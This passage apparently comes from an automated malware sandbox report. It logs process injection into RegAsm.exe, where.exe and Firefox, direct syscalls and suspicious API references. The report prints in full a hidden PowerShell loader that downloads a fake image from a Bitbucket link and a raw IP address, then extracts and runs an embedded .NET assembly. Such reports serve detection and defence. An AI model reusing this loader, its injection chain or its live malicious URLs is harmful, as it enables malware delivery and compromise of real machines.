        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03225734 mov eax, dword ptr fs:[00000030h]5_2_03225734
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F7703 mov eax, dword ptr fs:[00000030h]5_2_031F7703
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F5702 mov eax, dword ptr fs:[00000030h]5_2_031F5702
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F5702 mov eax, dword ptr fs:[00000030h]5_2_031F5702
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322273C mov eax, dword ptr fs:[00000030h]5_2_0322273C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322273C mov ecx, dword ptr fs:[00000030h]5_2_0322273C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322273C mov eax, dword ptr fs:[00000030h]5_2_0322273C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322C700 mov eax, dword ptr fs:[00000030h]5_2_0322C700
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F973A mov eax, dword ptr fs:[00000030h]5_2_031F973A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F973A mov eax, dword ptr fs:[00000030h]5_2_031F973A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E9730 mov eax, dword ptr fs:[00000030h]5_2_031E9730
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E9730 mov eax, dword ptr fs:[00000030h]5_2_031E9730
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03220710 mov eax, dword ptr fs:[00000030h]5_2_03220710
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322F71F mov eax, dword ptr fs:[00000030h]5_2_0322F71F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322F71F mov eax, dword ptr fs:[00000030h]5_2_0322F71F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F3720 mov eax, dword ptr fs:[00000030h]5_2_031F3720
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F0750 mov eax, dword ptr fs:[00000030h]5_2_031F0750
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200770 mov eax, dword ptr fs:[00000030h]5_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03203740 mov eax, dword ptr fs:[00000030h]5_2_03203740
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03203740 mov eax, dword ptr fs:[00000030h]5_2_03203740
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03203740 mov eax, dword ptr fs:[00000030h]5_2_03203740
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C3749 mov eax, dword ptr fs:[00000030h]5_2_032C3749
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322674D mov esi, dword ptr fs:[00000030h]5_2_0322674D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322674D mov eax, dword ptr fs:[00000030h]5_2_0322674D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322674D mov eax, dword ptr fs:[00000030h]5_2_0322674D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F8770 mov eax, dword ptr fs:[00000030h]5_2_031F8770

        HIPS / PFW / Operating System Protection Evasion

        Source: Yara match, File source: amsi64_3292.amsi.csv, type: OTHER
        Source: Yara match, File source: Process Memory Space: powershell.exe PID: 1276, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3292, type: MEMORYSTR
        Source: 4.2.powershell.exe.127d3c3a578.1.raw.unpack, Program2.cs, Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
        Source: 4.2.powershell.exe.127d3c3a578.1.raw.unpack, Program2.cs, Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
        Source: 4.2.powershell.exe.127d3c3a578.1.raw.unpack, Program2.cs, Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
        Source: 4.2.powershell.exe.127d3c3a578.1.raw.unpack, Program2.cs, Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtAllocateVirtualMemory: Direct from: 0x76EF48EC
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtQueryAttributesFile: Direct from: 0x76EF2E6C
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtQuerySystemInformation: Direct from: 0x76EF48CC
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtOpenSection: Direct from: 0x76EF2E0C
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtDeviceIoControlFile: Direct from: 0x76EF2AEC
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtQueryInformationToken: Direct from: 0x76EF2CAC
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtCreateFile: Direct from: 0x76EF2FEC
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtOpenFile: Direct from: 0x76EF2DCC
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtTerminateThread: Direct from: 0x76EF2FCC
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtOpenKeyEx: Direct from: 0x76EF2B9C
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtSetInformationProcess: Direct from: 0x76EF2C5C
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtProtectVirtualMemory: Direct from: 0x76EF2F9C
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtWriteVirtualMemory: Direct from: 0x76EF2E3C
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtNotifyChangeKey: Direct from: 0x76EF3C2C
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtCreateMutant: Direct from: 0x76EF35CC
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtResumeThread: Direct from: 0x76EF36AC
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtMapViewOfSection: Direct from: 0x76EF2D1C
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtClose: Direct from: 0x76EE7B2E
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtQuerySystemInformation: Direct from: 0x76EF2DFC
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtReadFile: Direct from: 0x76EF2ADC
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtDelayExecution: Direct from: 0x76EF2DDC
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtQueryInformationProcess: Direct from: 0x76EF2C26
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtResumeThread: Direct from: 0x76EF2FBC
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtCreateUserProcess: Direct from: 0x76EF371C
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtWriteVirtualMemory: Direct from: 0x76EF490C
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtSetInformationThread: Direct from: 0x76EE63F9
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtClose: Direct from: 0x76EF2B6C
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtSetInformationThread: Direct from: 0x76EF2B4C
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtReadVirtualMemory: Direct from: 0x76EF2E8C
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, NtCreateKey: Direct from: 0x76EF2C6C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: NULL target: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe protection: execute and read and write
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, Section loaded: NULL target: C:\Windows\SysWOW64\where.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\where.exe, Section loaded: NULL target: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe protection: read write
        Source: C:\Windows\SysWOW64\where.exe, Section loaded: NULL target: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\where.exe, Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\where.exe, Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\where.exe, Thread register set: target process: 5380
        Source: C:\Windows\SysWOW64\where.exe, Thread APC queued: target process: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1106008
        Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '...
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer/ina/312eihcir/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, Process created: C:\Windows\SysWOW64\where.exe "C:\Windows\SysWOW64\where.exe"
        Source: C:\Windows\SysWOW64\where.exe, Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$codigo = '...
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer/ina/312eihcir/moc.tnetnocresubuhtig.war//:sptth', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec
        Source: WKOyCvoOlM.exe, 00000007.00000000.2403080946.0000000001341000.00000002.00000001.00040000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000002.3404203393.0000000001341000.00000002.00000001.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000000.2559446813.0000000000F31000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
        Source: WKOyCvoOlM.exe, 00000007.00000000.2403080946.0000000001341000.00000002.00000001.00040000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000002.3404203393.0000000001341000.00000002.00000001.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000000.2559446813.0000000000F31000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
        Source: WKOyCvoOlM.exe, 00000007.00000000.2403080946.0000000001341000.00000002.00000001.00040000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000002.3404203393.0000000001341000.00000002.00000001.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000000.2559446813.0000000000F31000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
        Source: WKOyCvoOlM.exe, 00000007.00000000.2403080946.0000000001341000.00000002.00000001.00040000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000002.3404203393.0000000001341000.00000002.00000001.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000000.2559446813.0000000000F31000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation
